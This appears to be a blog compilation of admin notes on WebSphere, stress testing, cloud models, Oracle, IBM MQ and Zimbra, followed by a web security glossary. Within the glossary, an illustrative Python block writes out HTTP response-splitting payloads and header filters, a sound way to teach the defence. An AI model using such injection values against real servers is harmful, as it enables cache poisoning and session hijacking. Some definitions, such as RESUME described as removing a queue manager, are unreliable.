WebSphere JVM memory

The WebSphere Application Server (WAS) started to load very slowly and kept hanging on whatever action was selected, ending with a “java.lang.OutOfMemoryError” message in the WebSphere log file.

The default WebSphere Java Virtual Machine heap is not enough; allocate more memory to your WebSphere Application Server. The following guide shows how to increase the WebSphere JVM heap size.

1. In the WebSphere web console, select Servers -> Server Types -> WebSphere application servers -> Server Infrastructure -> Java and Process Management -> Process definition.

[Screenshot: WAS-adjust-memory-1]

2. In the Additional Properties section, select Java Virtual Machine.

[Screenshot: WAS-adjust-memory-2]

3. In the General Properties section, put 256 for “Initial heap size” and 1024 for “Maximum heap size”.

[Screenshot: WAS-adjust-memory-3]

Done. Restart WebSphere for the new heap settings to take effect.

LOAD THE CPU AND MEMORY ON Linux

Build and install the stress tool from source:

tar zxvf stress-1.0.4.tar.gz
cd stress-1.0.4
./configure
make && make install

To start stress, run stress followed by the -c (--cpu) flag for CPU load, -m (--vm) for memory stress, -i (--io) for I/O and -d (--hdd) for HDD. Each of these flags takes the number of workers to spawn; the amount of memory each memory worker allocates is set separately with --vm-bytes. For example, to run one memory worker allocating 512M:

stress --vm 1 --vm-bytes 512M

To load the CPU and memory at the same time, with 4 CPU workers and 2 memory workers of 10G each:

stress --cpu 4 --vm 2 --vm-bytes 10G

Cloud Service Model

IaaS, PaaS and SaaS are cloud computing service models.

IaaS (Infrastructure as a Service), as the name suggests, provides you with the computing infrastructure: physical or (quite often) virtual machines and other resources like a virtual-machine disk image library, block and file-based storage, firewalls, load balancers, IP addresses, virtual local area networks etc. Examples: Amazon EC2, Windows Azure, Rackspace.

PaaS (Platform as a Service), as the name suggests, provides you with computing platforms, which typically include an operating system, programming language execution environment, database, web server etc. Examples: AWS Elastic Beanstalk, Heroku, Force.com, Google App Engine.

In the SaaS (Software as a Service) model you are provided with access to application software, often referred to as on-demand software. You don’t have to worry about the installation, setup and running of the application; the service provider will do that for you. You just have to pay and use it through some client. Examples: Google Apps, Microsoft Office 365.

A few additional points regarding your question:

1- AWS (Amazon Web Services) is a complete suite which involves a whole bunch of useful web services. The most popular are EC2 and S3, and they belong to the IaaS service model.

2- Although Hadoop is based on previous works by Google (GFS and MapReduce), it is not from Google. It is an Apache project. You can find more here. It is just a distributed computing platform and does not fall into any of these service models, IMHO.

3- Microsoft’s Windows Azure is again an example of IaaS.

As far as the popularity of these services is concerned, they are all popular. It is just a matter of which one fits your requirements better. For example, if you want to have a Hadoop cluster on which you would run MapReduce jobs, you will find EC2 a perfect fit, which is IaaS. On the other hand, if you have some application, written in some language, and you want to deploy it over the cloud, you would choose something like Heroku, which is an example of PaaS.

IAAS (Infrastructure As A Service) :

• The base layer

• Deals with Virtual Machines, Storage (Hard Disks), Servers, Network, Load Balancers etc.

PAAS (Platform As A Service) :

• A layer on top of IAAS

• Runtimes (like Java runtimes), Databases (like MySQL, Oracle), Web Servers (Tomcat etc.)

SAAS (Software As A Service) :

• A layer on top of PAAS

• Applications like email (Gmail, Yahoo Mail etc.), Social Networking sites (Facebook etc.)

To quickly relate consider the below Google’s offerings:

IAAS : Google Compute Engine (One can develop programs to be run on high performing google’s computing infrastructure)

PAAS : Google App Engine (One can develop applications and let them execute on top of Google app engine which take care of the execution)

SAAS : Gmail, Google+ etc (One can use email services and extend email/google+ based applications to form newer applications)

Popularity

Company Wise Popularity

Cloud computing is dominated by
1. Amazon Web Services (AWS),
2. Google Compute Engine, Google App Engine
3. Microsoft Azure
4. There are many small and medium scale cloud operators, including IBM, Oracle etc.

Most of the popularity of these services is owed to the reputation of the company and the amount of investment being made by these companies in the cloud space.

Type of Service Wise Popularity
1. PAAS (Platform as a Service) is more popular among developers, as they can put all their concentration on developing their apps and leave the rest of the management and execution to the service provider. Many service providers also offer the flexibility to increase/decrease the CPU power depending upon the traffic load, giving developers cost-effective, easy and effortless management.
2. SAAS (Software as a Service) is more popular among consumers, who care about using the application, such as email, social networking etc.
3. IAAS (Infrastructure as a Service) is more popular among users in research and high-performance computing areas.

I found a great explanation from the “Windows Azure Platform: Cloud Development Jump Start” series in the first video (the video series is available both on iTunes and Zune and it covers the latest 1.3.x version of the SDK). The series is provided free of charge. Below are a couple of slides from the presentation:

Easy to understand one-word descriptions of each term (i.e. IaaS means host)

I really like the last slide, because it clearly breaks down the hierarchy of software layers into what each vendor service (IaaS, PaaS and SaaS) is responsible for and what you are responsible for. Also in the video one of the speakers (Manu Cohen-Yashar) breaks each service down by the “unit you are gaining” from the service:
IaaS – the unit you are gaining is a computer/server. Therefore IaaS is essentially a “physical server box”. An example of this would be going to RackSpace or SoftLayer and leasing a physical box from them. The vendor manages the networking, hard drives (if they fail), hardware of the box, and the virtualization O/S (if the box is virtualized). You can remote desktop to the box and you manage everything else (shown in the screenshot above). Windows Azure provides IaaS in the form of the VM Role (you upload a Windows Server 2008 R2 image and manage the server yourself).
PaaS – the unit you are gaining is an application/framework. Therefore PaaS is a “hosted application/framework/tools that you can leverage to build something on”. That application is configured on IIS/SQL Server etc. and runs on a hardware/virtual system that the vendor manages. An example of PaaS would be Windows Azure (excluding the VM Role) services like web role, worker role, Reporting Services etc.
SaaS – the unit you are gaining is business functionality. For example, Gmail is a type of SaaS mail provider because you don’t have to manage any service yourself and it is all done by the vendor (Google in this example).
I really like the clear examples and distinct definitions that are made in the videos. Hopefully, you can use these examples in explaining this to your boss or a non-technical person. I highly recommend you check out the “Windows Azure Platform: Cloud Development Jump Start” series if you are interested in learning about Azure or gaining general information on the cloud.

I am a strong believer in Cloud Computing. It is the trend of the IT industry; hardware vendors and software vendors alike will eventually step into this field or die. Actually, it is happening now. In the future, Cloud Computing will be just like water, electricity and cable, those everyday things that we pay for monthly to get the service. And we can also easily move to another Cloud service provider that can provide a better price and services. Currently, SaaS, PaaS and IaaS are the three main categories of the Cloud Computing Service Model in the market.

SaaS

Software as a Service (SaaS) is a software distribution model in which applications are hosted by a vendor or service provider and made available to customers over a network, typically the Internet.

SaaS is becoming an increasingly prevalent delivery model as underlying technologies that support Web services and service-oriented architecture (SOA) mature and new developmental approaches, such as Ajax, become popular. Meanwhile, broadband service has become increasingly available to support user access from more areas around the world.

SaaS is closely related to the ASP (application service provider) and on demand computing software delivery models. IDC identifies two slightly different delivery models for SaaS. The hosted application management (hosted AM) model is similar to ASP: a provider hosts commercially available software for customers and delivers it over the Web. In the software on demand model, the provider gives customers network-based access to a single copy of an application created specifically for SaaS distribution.

PaaS

Platform as a Service (PaaS) is a way to rent hardware, operating systems, storage and network capacity over the Internet. The service delivery model allows the customer to rent virtualized servers and associated services for running existing applications or developing and testing new ones.

Platform as a Service (PaaS) is an outgrowth of Software as a Service (SaaS), a software distribution model in which hosted software applications are made available to customers over the Internet. PaaS has several advantages for developers. With PaaS, operating system features can be changed and upgraded frequently. Geographically distributed development teams can work together on software development projects. Services can be obtained from diverse sources that cross international boundaries. Initial and ongoing costs can be reduced by the use of infrastructure services from a single vendor rather than maintaining multiple hardware facilities that often perform duplicate functions or suffer from incompatibility problems. Overall expenses can also be minimized by unification of programming development efforts.

On the downside, PaaS involves some risk of “lock-in” if offerings require proprietary service interfaces or development languages. Another potential pitfall is that the flexibility of offerings may not meet the needs of some users whose requirements rapidly evolve.

IaaS

Infrastructure as a Service (IaaS) is a provision model in which an organization outsources the equipment used to support operations, including storage, hardware, servers and networking components. The service provider owns the equipment and is responsible for housing, running and maintaining it. The client typically pays on a per-use basis. Infrastructure as a Service is sometimes referred to as Hardware as a Service (HaaS).

Some segments within the three major cloud service categories:

IDaaS

Identity as a Service (IDaaS) is an authentication infrastructure that is built, hosted and managed by a third-party service provider. IDaaS can be thought of as single sign-on (SSO) for the cloud.

An IDaaS for the enterprise is typically purchased as a subscription-based managed service. A cloud service provider may also host applications for a fee and provide subscribers with role-based access to specific applications or even entire virtualized desktops through a secure portal.

SaaS

Storage as a Service (SaaS) is a business model in which a large company rents space in their storage infrastructure to a smaller company or individual.

In the enterprise, SaaS vendors are targeting secondary storage applications by promoting SaaS as a convenient way to manage backups. The key advantage to SaaS in the enterprise is in cost savings — in personnel, in hardware and in physical storage space. For instance, instead of maintaining a large tape library and arranging to vault (store) tapes offsite, a network administrator that used SaaS for backups could specify what data on the network should be backed up and how often it should be backed up. His company would sign a service level agreement (SLA) whereby the SaaS provider agreed to rent storage space on a cost-per-gigabyte-stored and cost-per-data-transfer basis and the company’s data would be automatically transferred at the specified time over the storage provider’s proprietary wide area network (WAN) or the Internet. If the company’s data ever became corrupt or got lost, the network administrator could contact the SaaS provider and request a copy of the data.

Storage as a Service is generally seen as a good alternative for a small or mid-sized business that lacks the capital budget and/or technical personnel to implement and maintain their own storage infrastructure. SaaS is also being promoted as a way for all businesses to mitigate risks in disaster recovery, provide long-term retention for records and enhance both business continuity and availability.

CaaS

Communications as a Service (CaaS) is an outsourced enterprise communications solution that can be leased from a single vendor. Such communications can include voice over IP (VoIP or Internet telephony), instant messaging (IM), collaboration and videoconference applications using fixed and mobile devices. CaaS has evolved along the same lines as Software as a Service (SaaS).

The CaaS vendor is responsible for all hardware and software management and offers guaranteed Quality of Service (QoS). CaaS allows businesses to selectively deploy communications devices and modes on a pay-as-you-go, as-needed basis. This approach eliminates the large capital investment and ongoing overhead for a system whose capacity may often exceed or fall short of current demand.

CaaS offers flexibility and expandability that small and medium-sized business might not otherwise afford, allowing for the addition of devices, modes or coverage on demand. The network capacity and feature set can be changed from day to day if necessary so that functionality keeps pace with demand and resources are not wasted. There is no risk of the system becoming obsolete and requiring periodic major upgrades or replacement.

SaaS

Security as a Service (SaaS) is an outsourcing model for security management. Typically, Security as a Service involves applications such as anti-virus software delivered over the Internet, but the term can also refer to security management provided in-house by an external organization. Security as a Service product vendors include Cisco, McAfee, Panda Software, Symantec, Trend Micro and VeriSign.

TNS-12541 TNS-12560 TNS-00511 Linux Error: 111

[oracle@localhost ~]$ lsnrctl

LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 18-JAN-2012 22:45:15

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Welcome to LSNRCTL, type "help" for information.

LSNRCTL> reload
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused
LSNRCTL> service
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Linux Error: 111: Connection refused

This problem is related to the IP address: the listener is configured with HOST=localhost.localdomain, and that name must resolve locally before the listener can bind and lsnrctl can connect to it. To solve it, follow these simple steps:

[oracle@localhost ~]$ su - root
Password:
[root@localhost ~]# vi /etc/hosts   (add the line below)

127.0.0.1 localhost.localdomain localhost

[root@localhost ~]# su - oracle
[oracle@localhost ~]$ lsnrctl start

LSNRCTL for Linux: Version 10.2.0.1.0 - Production on 18-JAN-2012 22:51:23

Copyright (c) 1991, 2005, Oracle. All rights reserved.

Starting /u01/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Linux: Version 10.2.0.1.0 - Production
System parameter file is /u01/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost.localdomain)(PORT=1521)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=localhost.localdomain)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Linux: Version 10.2.0.1.0 - Production
Start Date                18-JAN-2012 22:51:24
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=localhost.localdomain)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Service "orcl" has 1 instance(s).
Instance "orcl", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully

[oracle@localhost ~]$
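The check behind the fix above, as an added example that is not part of the original post: before running lsnrctl start, confirm that every HOST named in listener.ora actually resolves and whether anything already listens on the TNS port. The sample listener.ora contents and the function names are my own; the path in the comment is the one the post's output shows.

```python
import re
import socket

# Constructed sample of the file the post refers to
# (/u01/oracle/product/10.2.0/db_1/network/admin/listener.ora); the contents are mine.
SAMPLE_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1))
      (ADDRESS = (PROTOCOL = TCP)(HOST = localhost.localdomain)(PORT = 1521))
    )
  )
"""

# Oracle Net files write "(HOST = name)" or "(HOST=name)"; accept both spellings.
HOST_RE = re.compile(r"\(\s*HOST\s*=\s*([^)\s]+)\s*\)", re.IGNORECASE)
PORT_RE = re.compile(r"\(\s*PORT\s*=\s*(\d+)\s*\)", re.IGNORECASE)


def listener_hosts(text):
    """Distinct HOST values, in the order they appear in listener.ora."""
    hosts = []
    for host in HOST_RE.findall(text):
        if host not in hosts:
            hosts.append(host)
    return hosts


def listener_ports(text):
    """Distinct TCP ports the listener is configured for, in file order."""
    ports = []
    for port in PORT_RE.findall(text):
        if int(port) not in ports:
            ports.append(int(port))
    return ports


def resolves(host):
    """True if the OS resolver (/etc/hosts first, then DNS) maps host to an address.
    A HOST that fails here is exactly the case the /etc/hosts line in the post fixes."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def port_listening(host, port, timeout=2.0):
    """True if something accepts TCP connections on host:port.
    'Connection refused' (the Linux Error: 111 in the post) means nothing is listening yet."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def diagnose(text):
    """Map each HOST in listener.ora to (resolves, listener reachable on the first TCP port)."""
    ports = listener_ports(text) or [1521]
    report = {}
    for host in listener_hosts(text):
        ok = resolves(host)
        report[host] = (ok, ok and port_listening(host, ports[0]))
    return report


if __name__ == "__main__":
    for host, (res, up) in diagnose(SAMPLE_LISTENER_ORA).items():
        if not res:
            print(f"{host}: does not resolve; add it to /etc/hosts before lsnrctl start")
        elif not up:
            print(f"{host}: resolves but nothing listens on the TNS port; run lsnrctl start")
        else:
            print(f"{host}: listener reachable")
```

Run it as the oracle user with the real file contents (open() the path from your ORACLE_HOME) to tell an unresolvable HOST apart from a listener that simply has not been started.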

HOW TO UNINSTALL ORACLE COMPLETELY FROM LINUX REDHAT OR CENTOS.
Simply run the following commands as root:

[root@localhost ~]# rm -f /etc/oraInst.loc

[root@localhost ~]# rm -f /etc/oratab

[root@localhost ~]# rm -R -f /etc/oracle

MQ admin Commands

dspmqver :- to display the MQ series version
dspmq :- to view all queue managers of MQ series
crtmqm :- to create a queue manager
strmqm :- to start a queue manager
runmqsc :- to enter a particular queue manager (MQSC command console)
endmqm :- to end a queue manager
dltmqm :- to delete a queue manager
dspmqcsv :- to display the command server status
endmqcsv :- to end the command server
strmqcsv :- to start the command server
runmqlsr :- to run the listener service
endmqlsr :- to end the listener service
runmqchl :- to run a channel of a queue manager
runmqdlq :- to execute the dead-letter queue handler with the help of a rule table
setmqaut :- to set authorizations on particular objects (queue manager, queues, channels, listeners) for a user or group
dspmqaut :- to display the authorization of a particular user
dmpmqaut :- to dump the authorizations of a particular user
runmqchi :- to run a channel initiator for a particular queue manager
runmqtrm :- to run a trigger monitor on the initiation queue of a particular queue manager
rcdmqimg :- to record an image of a particular queue manager's objects
rcrmqobj :- to recreate MQ objects that have already been recorded

Useful syntax of the RUNMQSC utility for handling a Queue Manager

DEFINE :- to define/create queue manager objects like queues, channels, processes and listeners
ALTER :- to update or modify existing objects
DISPLAY :- to view all the properties of a particular object, or to display all objects
DELETE :- to delete created objects
CLEAR :- to clear the messages from a queue
END :- to come out of the queue manager
PING :- to check whether the channel / queue manager on the other side is ready to accept our requests
START :- to start a particular channel or listener
STOP :- to stop a particular channel or listener
REFRESH :- to refresh security after every setmqaut or other authority change on the queue manager or an object, so that the change takes effect
RESET :- to reset a channel, cluster or queue manager
RESOLVE :- to resolve a channel that is in the in-doubt state
SUSPEND :- to suspend a queue manager from a cluster environment
RESUME :- to remove a queue manager from a cluster environment

How to Migrate a Zimbra mail server from one machine to another new machine

A ) Zimbra old server

1 ) As the root user, switch to the zimbra user:

root@root:~# su zimbra

2 ) Now stop the Zimbra services:

zimbra@zimbra:~$ zmcontrol stop

Now move to the new server, which has the same OS configuration and has the Zimbra mail application installed on it.

B ) Zimbra new server
1 ) As the root user [ use sudo -i ]

[ make sure you have installed the same version of Zimbra with the same configuration, like the domain name etc. ]

We now perform the first copy of the Zimbra directory from the old mail server to the new mail server. On the new server we must stop Zimbra. Zimbra on the old machine can be stopped, or left running on the live server for now to reduce downtime.

The following rsync command is run on the new mail server. Substitute the hostname or IP address of the old server as required in the command below.

a ) On the new mail server [ rsync from the old server to the new server ]

service zimbra stop

or

zimbra@zimbra:~$ zmcontrol stop

rsync -aHz --force --delete live_server:/opt/zimbra/ /opt/zimbra/

e.g.: rsync -aHz --force --delete root@192.168.28.6:/opt/zimbra/ /opt/zimbra/
[ where IP 192.168.28.6 is our old mail server ]

Note the trailing slashes on both paths: they copy the contents of /opt/zimbra into /opt/zimbra rather than creating /opt/zimbra/zimbra, and --delete removes anything on the new server that is not on the old one.

b ) Now execute the commands below after the rsync is done, to restore ownership and permissions:

chown -R zimbra:zimbra /opt/zimbra
/opt/zimbra/libexec/zmfixperms

Now reboot the machine.

root@root:~# reboot

c ) Start Zimbra. Everything should work.

The Web Security Glossary

Description
The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to clarify the language used within the community.

Project leader: Robert Auger (contact @ webappsec org)

Abuse of Functionality: An attack technique that uses the features and functionality of a web site to consume, defraud, or circumvent the site’s access controls. See also “Denial of Service”.

ActiveX: A program, called a “control”, developed using ActiveX technologies. ActiveX controls can be downloaded and executed within technology-enabled Web browsers. ActiveX is a set of rules for how applications should share information. ActiveX controls can be developed in C, C++, Visual Basic, and Java. See also “Java”, “Java Applets”, “JavaScript”, “Web Browser”.

AJAX: AJAX stands for Asynchronous JavaScript and XML. This browser based technology allows a website to perform additional resource requests without refreshing the user page by utilizing the XMLHttpRequest Javascript object.

Anti-Automation: Security measure that prevents automated programs from exercising web site functionality by administering the Turing Test to a user, which only a human could pass. See also “Visual Verification”.

Application Server: A software server, normally using HTTP, which has the ability to execute dynamic web applications. Also known as middleware, this piece of software is normally installed on or near the web server where it can be called upon. See also “Web Application”, “Web Server”.

Attack: A well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation.

Authentication: The process of verifying the identity or location of a user, service or application. Authentication is performed using at least one of three mechanisms: “something you have”, “something you know” or “something you are”. The authenticating application may provide different services based on the location, access method, time of day, etc. See also “Insufficient Authentication”.

Authorization: The determination of what resources a user, service or application has permission to access. Accessible resources can be URLs, files, directories, servlets, databases, execution paths, etc. See also “Insufficient Authorization”.

Backup File Disclosure: (Obsolete) See “Predictable File Location”.

Basic Authentication: A simple form of client-side authentication supported in HTTP. The http-client sends a request header to the web server containing a Base64 encoded username and password. If the username/password combination is valid, the web server grants the client access to the requested resource. See also “Authentication”, “Insufficient Authentication”.

Brute Force: An automated process of trial and error used to guess the “secret” protecting a system. Examples of these secrets include usernames, passwords or cryptographic keys. See also “Authentication”, “Insufficient Authentication”, “Password Recover System”, “Weak Password Recovery Validation”.

Buffer Overflow: An exploitation technique that alters the flow of an application by overwriting parts of memory. Buffer Overflows are a common cause of malfunctioning software. If the data written into a buffer exceeds its size, adjacent memory space will be corrupted and normally produce a fault. An attacker may be able to utilize a buffer overflow situation to alter an application’s process flow. Overfilling the buffer and rewriting memory-stack pointers could be used to execute arbitrary operating-system commands.

CGI Scanner: Automated security program that searches for well-known vulnerabilities in web servers and off-the-shelf web application software. Often CGI Scanners are not very “stateful” in their analysis and only test a series of HTTP requests against known CGI strings. See also “Web Application Vulnerability Scanner”.

CGI Security: (Obsolete) See “Web Application Security”.

Client-Side Scripting: Web browser feature that extends the functionality and interactivity of static HyperText markup language (HTML) web pages. Examples of Client-Side Scripting languages are JavaScript, JScript and VBScript. See also “ActiveX controls”, “Java Applets”.

Common Gateway Interface: (Acronym – CGI) Programming standard for software to interface and execute applications residing on web servers. See also “Web Application”, “Application Server”, “Web Server”.

Configuration File Disclosure: (Obsolete) See “Predictable File Location”.

Content Spoofing: An attack technique used to trick a user into thinking that fake web site content is legitimate data.

Cookie: Small amount of data sent by the web server, to a web client, which can be stored and retrieved at a later time. Typically cookies are used to keep track of a user’s state as they traverse a web site. See also “Cookie Manipulation”.

Cookie Manipulation: Altering or modification of cookie values, on the client’s web browser, to exploit security issues within a web application. Attackers will normally manipulate cookie values to fraudulently authenticate themselves to a web site. This is an example of the problem of trusting the user to provide reasonable input. See also “Cookie”.

Cookie Poisoning: (Obsolete) See “Cookie Manipulation”.

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). See also “Client-Side Scripting”.

Debug Commands: Application debugging features or commands that assist in identifying programming errors during the software development process.

Denial of Service: (Acronym – DoS) An attack technique that consumes all of a web site’s available resources with the intent of rendering legitimate use impossible. Resources include CPU time, memory utilization, bandwidth, disk space, etc. When any of these resources reach full capacity, the system will normally be inaccessible to normal user activity. See also “Abuse of Functionality”.

Directory Browsing: (Obsolete) See “Directory Indexing”.

Directory Enumeration: (Obsolete) See “Predictable File Location”.

Directory Indexing: A feature common to most popular web servers, that exposes contents of a directory when no index page is present. See also “Predictable File Location”.

Directory Traversal: A technique used to exploit web sites by accessing files and commands beyond the document root directory. Most web sites restrict user access to a specific portion of the file-system, typically called the document root directory or CGI root directory. These directories contain the files and executables intended for public use. In most cases, a user should not be able to access any files beyond this point.

DOM Based Cross Site Scripting: DOM based cross-site scripting (or “DOM based XSS” in short) is a “cross-site scripting” attack that makes use of insecure JavaScript (or in general, client side) programming that takes place in response pages, to effectively incur an XSS condition. In DOM based XSS, the attacker affects the JavaScript execution in a target page (in the attacked domain) by providing it with data in the URL or the Referer, which the script insecurely uses. The script may apply the eval() function to the malicious data, or embed it in the DOM (thus making the browser potentially render it as JavaScript and run it). This is in contrast to “standard” XSS, where the malicious data is embedded in the page at the server side. In some cases, DOM based XSS can even be conducted in such a way that the malicious payload doesn’t even reach the server, which makes this attack more unobtrusive.

Encoding Attacks: An exploitation technique that aids an attack by changing the format of user-supplied data to bypass sanity checking filters. See also “Null Injection”.

Extension Manipulation: (Obsolete) See “Filename Manipulation”.

File Enumeration: (Obsolete) See “Predictable File Location”.

Filename Manipulation: An attack technique used to exploit web sites by manipulating URL filenames to cause application errors, discover hidden content, or display the source code of an application. See also “Predictable File Location”.

Filter-Bypass Manipulation: See “Encoding Attacks”.

Forced Browsing: See “Predictable File Location”.

Form Field Manipulation: Altering or modification of HTML Form-Field input values or HTTP post-data to exploit security issues within a web application. See also “Parameter Tampering”, “Cookie Manipulation”.

Format String Attack: An exploit technique that alters the flow of an application by using string formatting library features to access other memory space.

Frame Spoofing: (Obsolete) See “Content Spoofing”.

HyperText Transfer Protocol: (Acronym – HTTP) A protocol scheme used on the World Wide Web. HTTP describes the way a web-client requests data and how a web server responds to those requests. See also “Web Server”, “Web Browser”.

HTTP Request Smuggling: HTTP Request Smuggling works by taking advantage of the discrepancies in parsing when one or more HTTP devices/entities (e.g. cache server, proxy server, web application firewall, etc.) are in the data flow between the user and the web server. HTTP Request Smuggling enables various attacks, such as “web cache poisoning”, “session hijacking” and “cross-site scripting”, as well as the ability to bypass web application firewall protection. The attacker sends multiple specially-crafted HTTP requests that cause the two attacked entities (e.g. a proxy server and a web server, or a firewall and a web server) to see two different sets of requests, allowing the hacker to smuggle a request to one device without the other device being aware of it.

HTTP Response Smuggling: HTTP response smuggling is an enhancement of the basic “HTTP response splitting” technique, which can evade anti-HTTP-response-splitting measures. HTTP response smuggling makes use of “HTTP request smuggling”-like techniques to exploit the discrepancies between what an anti-HTTP-response-splitting mechanism would consider to be the HTTP response stream, and the response stream as parsed by a proxy server (or a browser). So, while an anti-HTTP-response-splitting mechanism may consider a particular response stream harmless (a single HTTP response), a proxy/browser may still parse it as two HTTP responses, and hence be susceptible to all the outcomes of the original HTTP response splitting technique. For example, some anti-HTTP-response-splitting mechanisms in use by some application engines forbid the application from inserting a header containing CR+LF into the response. Yet an attacker can force the application to insert a header containing CRs, thereby circumventing the defense mechanism. Some proxy servers may still treat CR (only) as a header (and response) separator, and as such the combination of web server and proxy server will still be vulnerable to an attack that may poison the proxy’s cache.

HTTP Response Splitting: An HTTP response splitting attack causes the web server to send out two HTTP responses, where it typically only sends out one HTTP response (hence the name – “response splitting”). This can be described as HTTP response injection, and is typically conducted by injecting malicious data into an HTTP response header, and using CR+LF characters to shape and terminate the first response, and then completely shape and control the additional response. Having this second, “unexpected” response enables the attacker to fool a client that receives this extra response by forcing this client to first emit a second request. The client then matches the second, attacker-controlled response to the second, attacker-controlled request. The net result (looking at the second request-response pair) is that the client is forced to send an arbitrary request to the vulnerable server, and in response, the client receives an arbitrary response crafted by the attacker. This condition enables “cross-site scripting” and “cache poisoning”.
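As an added illustration of the two entries above (this code is not part of the glossary), the following Python shows why a filter that only rejects the CR+LF pair is not enough: a header value containing a bare CR passes it, yet a parser that accepts CR alone as a line terminator still sees two responses. The sample payloads, the build_redirect helpers and the lenient response counter are all constructed for this example.

```python
import re

# Constructed example values (not traffic from the page): what an application
# might copy verbatim from a request parameter into a Location header.
SAFE_VALUE = "/account?id=42"
CRLF_PAYLOAD = "/account\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
CR_ONLY_PAYLOAD = CRLF_PAYLOAD.replace("\r\n", "\r")   # the bare-CR variant the glossary describes

# Field-value characters allowed by RFC 9110: HTAB, SP, visible ASCII and obs-text.
_FIELD_VALUE = re.compile(r"[\t\x20-\x7e\x80-\xff]*")


def naive_filter_accepts(value: str) -> bool:
    """The weak check the glossary warns about: only the CR+LF pair is rejected."""
    return "\r\n" not in value


def strict_filter_accepts(value: str) -> bool:
    """Reject a bare CR, a bare LF and every other control character."""
    return _FIELD_VALUE.fullmatch(value) is not None


def build_redirect(location: str) -> bytes:
    """Vulnerable construction: the value is inserted without validation."""
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n\r\n"
    ).encode("latin-1")


def build_redirect_safely(location: str) -> bytes:
    """Hardened construction: refuse any value that could end a header line."""
    if not strict_filter_accepts(location):
        raise ValueError("header value contains CR, LF or another control character")
    return build_redirect(location)


def count_responses_lenient(raw: bytes) -> int:
    """Count responses the way a lenient proxy or browser might: CRLF, bare LF
    and bare CR all terminate a header line, so an injected status line is honoured."""
    lines = re.split(r"\r\n|\r|\n", raw.decode("latin-1"))
    return sum(1 for line in lines if line.startswith("HTTP/1."))


if __name__ == "__main__":
    for label, value in (("safe", SAFE_VALUE), ("crlf", CRLF_PAYLOAD), ("cr-only", CR_ONLY_PAYLOAD)):
        print(label, "naive:", naive_filter_accepts(value), "strict:", strict_filter_accepts(value),
              "responses seen:", count_responses_lenient(build_redirect(value)))
```

The design point is that validation must be phrased in terms of what is allowed in a field value, not in terms of the one separator the developer happens to remember; a whitelist of permitted characters covers the CR-only case, a bare LF, and every other control character at once.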

Impact: Consequences for an organization or environment when an attack is realized, or weakness is present.

Information Leakage: When a web site reveals sensitive data, such as developer comments or error messages, which aids an attacker in exploiting the system. See also “Verbose Messages”.

Insufficient Authentication: When a web site permits an attacker to access sensitive content or functionality without verifying their identity. See also “Authentication”.

Insufficient Authorization: When a web site permits an attacker to access sensitive content or functionality that should require increased access control restrictions. See also “Authorization”.

Insufficient Session Expiration: When a web site permits an attacker to reuse old session credentials or session ID’s for authorization. See also “Session Replay”, “Session Credential”, “Session ID”, “Session Manipulation”.

Insufficient Process Validation: When a web site permits an attacker to bypass or circumvent the intended flow control of an application.

Java: A popular programming language developed by Sun Microsystems(tm). See also “ActiveX controls”, “Web Browser”, “JavaScript”, “Client-Side Scripting”.

Java Applets: An applet is a program written in the Java programming language that can be included in a web page. When a Java enabled web browser views a page containing an applet, the code is executed by the Java Virtual Machine (JVM). See also “Web Browser”, “Java”, “ActiveX controls”, “JavaScript”, “Client-Side Scripting”.

JavaScript: A popular web browser client-side scripting language used to create dynamic web page content. See also “Active X”, “Java Applets”, “Client-Side Scripting”.

Known CGI file: See “Predictable File Location”.

Known Directory: See “Predictable File Location”.

LDAP Injection: A technique for exploiting a web site by altering backend LDAP statements through manipulating application input, in the same way that SQL Injection alters backend SQL statements. See also “Parameter Tampering”, “Form Field Manipulation”.

Meta-Character Injection: An attack technique used to exploit web sites by sending in meta-characters, which have special meaning to a web application, as data input. Meta-characters are characters that have special meaning to programming languages, operating system commands, individual program procedures, database queries, etc. These special characters can adversely alter the behavior of a web application. See also “Null Injection”, “Parameter Tampering”, “SQL Injection”, “LDAP Injection”, “Cross-Site Scripting”.

